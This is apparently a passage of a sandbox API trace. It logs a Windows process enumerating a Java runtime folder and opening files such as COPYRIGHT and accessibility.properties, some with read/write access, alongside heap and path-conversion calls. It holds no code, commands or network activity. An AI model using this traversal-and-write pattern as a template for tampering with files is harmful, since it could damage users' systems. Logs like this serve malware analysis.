[0094.184] CloseHandle (hObject=0x27c) returned 1 [0094.185] AreFileApisANSI () returned 1 [0094.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0094.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0094.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 45 [0094.185] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0094.185] GetFileType (hFile=0x27c) returned 0x1 [0094.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0094.185] CloseHandle (hObject=0x27c) returned 1 [0094.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.186] AreFileApisANSI () returned 1 [0094.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0094.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 45 [0094.186] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcac)) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.186] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.186] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.186] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe1f09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="lib", cAlternateFileName="")) returned 1 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0094.187] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.187] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0094.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0094.187] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0094.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.187] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0094.187] AreFileApisANSI () returned 1 [0094.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib", lpUsedDefaultChar=0x0) returned 39 [0094.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0094.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0094.187] AreFileApisANSI () returned 1 [0094.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0094.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cea0 [0094.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x6cea0, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib") returned 39 [0094.187] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.187] GetLastError () returned 0x5 [0094.187] GetLastError () returned 0x5 [0094.187] SetLastError (dwErrCode=0x5) [0094.187] GetLastError () returned 0x5 [0094.187] SetLastError (dwErrCode=0x5) [0094.188] GetLastError () returned 0x5 [0094.188] SetLastError (dwErrCode=0x5) [0094.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0094.188] AreFileApisANSI () returned 1 [0094.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0094.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d688 [0094.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib") returned 39 [0094.188] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.188] GetLastError () returned 0x5 [0094.188] GetLastError () returned 0x5 [0094.188] SetLastError (dwErrCode=0x5) [0094.188] GetLastError () returned 0x5 [0094.188] SetLastError (dwErrCode=0x5) [0094.188] GetLastError () returned 0x5 [0094.188] SetLastError (dwErrCode=0x5) [0094.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0094.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0094.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0094.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.188] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.188] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.188] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.188] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0094.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0094.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0094.188] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0094.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0094.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0094.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0094.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0094.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0094.189] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78150 [0094.496] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0fe1f09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.498] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x95, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.properties", cAlternateFileName="ACCESS~1.PRO")) returned 1 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0094.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0094.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0094.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0094.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0094.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0094.499] AreFileApisANSI () returned 1 [0094.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties", lpUsedDefaultChar=0x0) returned 64 [0094.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0094.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0094.499] AreFileApisANSI () returned 1 [0094.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0094.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0094.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 64 [0094.499] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.501] GetFileType (hFile=0x360) returned 0x1 [0094.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0094.501] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.501] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.501] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.502] CloseHandle (hObject=0x360) returned 1 [0094.502] AreFileApisANSI () returned 1 [0094.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0094.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0094.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e2d8, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 64 [0094.502] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.502] GetFileType (hFile=0x360) returned 0x1 [0094.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0094.502] CloseHandle (hObject=0x360) returned 1 [0094.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.503] 